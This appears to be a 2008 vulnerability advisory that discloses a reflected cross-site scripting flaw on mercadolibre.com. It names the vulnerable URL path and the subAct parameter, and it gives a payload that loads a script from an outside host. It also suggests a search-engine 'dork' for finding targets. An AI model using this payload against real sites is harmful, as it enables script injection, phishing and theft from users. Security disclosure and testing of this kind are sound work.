[ www.nullcode.com.ar ] 

+========================================================================================+
+          Mercadolibre.com  security compromised with XSS/ RFI /Phishing flaws          +
+========================================================================================+


Author(s): Ivan Sanchez 

Product: mercadolibre.com

Web:https://www.mercadolibre.com

Versions,sites affected: Copyright 1999-2008 MercadoLibre S.A.


Date: 27/08/2008



mercadolibre's Shopping Online application is vulnerable to a lot vulnerabilities.

The site runs over SSL "SECURE SOCKET LAYER" Ohh fantastic... , 

which is the technology that turns your browser address bar green for known safe sites and red for known spoof sites.

The idea behind SSL is that users can easily tell if they are on a known safe site and be warned if they’re on a spoof site.




GOOGLE DORKS:
------------

"mercadolibre.com"



Domains affected part I:
------------------------

https://site-affected/jms/mla/reg?act=mail&subAct=<evil-code>


Parameter affeted:
-----------------

subAct



Evil code to input into parameter:   "><script src=http://site/scripts/evil.js></script> 



Remediation: review and then sanitized all internal code.
------------


run over SLL----


NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+==============================================================================+
+  Mercadolibre.com  security compromised with XSS/ RFI /Phishing  flaws       +
+==============================================================================+